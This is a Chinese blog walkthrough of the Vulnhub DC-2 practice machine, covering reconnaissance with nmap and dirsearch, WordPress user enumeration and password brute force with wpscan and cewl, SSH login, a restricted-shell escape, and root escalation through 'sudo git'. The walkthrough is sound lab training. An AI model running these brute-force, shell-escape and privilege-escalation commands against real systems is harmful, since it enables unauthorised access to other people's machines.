Vulnhub靶机——DC-2

目录

一、实验环境

1.1 攻击机Kali

1.2 靶机下载

1.3 工具准备

二、站点信息收集

2.1 IP扫描

2.2 端口扫描

2.3 网页信息收集

2.4 目录扫描

三、漏洞利用

3.1 暴力破解

3.2 ssh连接

3.3 rbash绕过

四、权限提升

4.1 git提权

4.2 查找flag

一、实验环境

1.1 攻击机Kali

(1)在虚拟机中安装Kali系统并作为攻击机,将网络连接设置成NAT模式

(2)Kali的IP地址为192.168.101.130

1.2 靶机下载

(1)下载地址: DC: 2 ~ VulnHub

(2)通过上述简介可以知道,此盒子旨在为渗透测试领域积累经验,总共有五面旗帜,但最终目标是找到并读取root用户主目录中的那面旗帜。

(3)直接在VMware虚拟机中导入该靶机,将网络连接设置成NAT模式

(4)开启靶机

1.3 工具准备
  • Wappalyzer插件
  • wpscan
  • cewl

二、站点信息收集

2.1 IP扫描

(1)使用命令netdiscover查找靶机的IP地址

(2)发现靶机地址为192.168.101.135

2.2 端口扫描

(1)使用nmap工具对目标机进行端口扫描,发现打开了80端口(http服务)和7744端口(ssh服务)

(2)访问http://192.168.101.135,页面无法访问,根据提示信息得知目标进行了重定向

(3)需要修改本地hosts文件,进行DNS解析

vim /etc/hosts

(4)重新访问http://192.168.101.135,访问成功

2.3 网页信息收集

(1)在网页找到了flag1,提示为使用cewl工具进行暴力破解

(2)使用火狐浏览器的Wappalyzer插件进行CMS识别,发现CMS是WordPress

2.4 目录扫描

使用dirsearch工具对网站目录进行扫描

dirsearch -u http://192.168.101.135

三、漏洞利用

3.1 暴力破解

(1)访问目录扫描出来的后台登录页面,根据提示尝试暴力破解

(2)由于该网站的CMS是wordpress,我们采用专门针对wordpress的工具wpscan来进行扫描用户,扫到了三个用户:admin、jerry和tom

WPScan 是一个专为 WordPress 网站设计的安全扫描工具,它能够识别出网站中使用的插件、主题和核心版本的已知漏洞,执行暴力破解尝试,检测不安全的配置以及文件权限问题,帮助网站管理员提高 WordPress 网站的安全性,防止潜在的攻击。

​wpscan --url http://dc-2/ -e u

(3)使用cewl对目标网站生成密码字典

cewl 是一个用于抓取目标网站内容并生成自定义字典的工具。它会从指定的网页中提取单词,通常用于渗透测试中的字典攻击,比如暴力破解(Brute Force)等。

​cewl http://dc-2 -w passwd.txt

(4)将扫描到的三个用户写入user.txt文件

(5)使用wpscan将user.txt与passwd.txt匹配爆破用户密码

​wpscan --url http://dc-2/ -e -U /home/kali/user.txt -P /home/kali/passwd.txt

Username: jerry, Password: adipiscing
Username: tom, Password: parturient

(6)使用jerry账号登录成功,并在page页面找到了flag2

(7)flag2提示如下,意思是如果你不能利用WordPress并走捷径,还有另一种方法

3.2 ssh连接

(1)使用jerry用户进行连接,连接失败

ssh jerry@192.168.101.135 -p 7744

(2)使用tom用户进行连接,连接成功

ssh tom@192.168.101.135 -p 7744

3.3 rbash绕过

(1)查看当前用户权限,发现被rbash限制了

rbash(restricted bash)是Bash的一种受限模式,通常用于限制用户的操作,防止他们进行潜在的危险行为,比如访问不该访问的文件或修改系统设置。

(2)查看当前shell环境中可用的所有命令

compgen -c

(3)查看当前环境变量

echo $PATH

(4)利用bash_cmds自定义一个shell,并添加两条环境变量

BASH_CMDS[a]=/bin/sh
a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

(5)找到了flag3.txt,提示切换用户

(6)切换到jerry用户,password就是上面爆破出来的密码,并在对应目录下找到了flag4.txt,提示我们可以使用git,即通过git来提权

四、权限提升

4.1 git提权

(1)查看一下可以使用的root权限命令

(2)查看当前用户可以通过sudo执行的命令列表

(3)使用git命令进行提取,直接在文件末尾输入!/bin/bash

sudo git help status

(4)回车后即为root用户,提权成功

4.2 查找flag

切换到root目录下,即可找到最后一个flag

声明

1.本博客文章均为博主日常学习原创内容,转载请注明出处。

2.文章内容如有涉及侵犯您的知识产权和版权问题,请及时与我联系。

3.希望以上的学习经验分享能对您有所帮助。

4.本内容仅供学习和研究使用,严禁用于任何非法或不道德的行为,任何违反法律的行为将由行为人自行承担。

Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.youkuaiyun.com/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.youkuaiyun.com/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.youkuaiyun.com/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值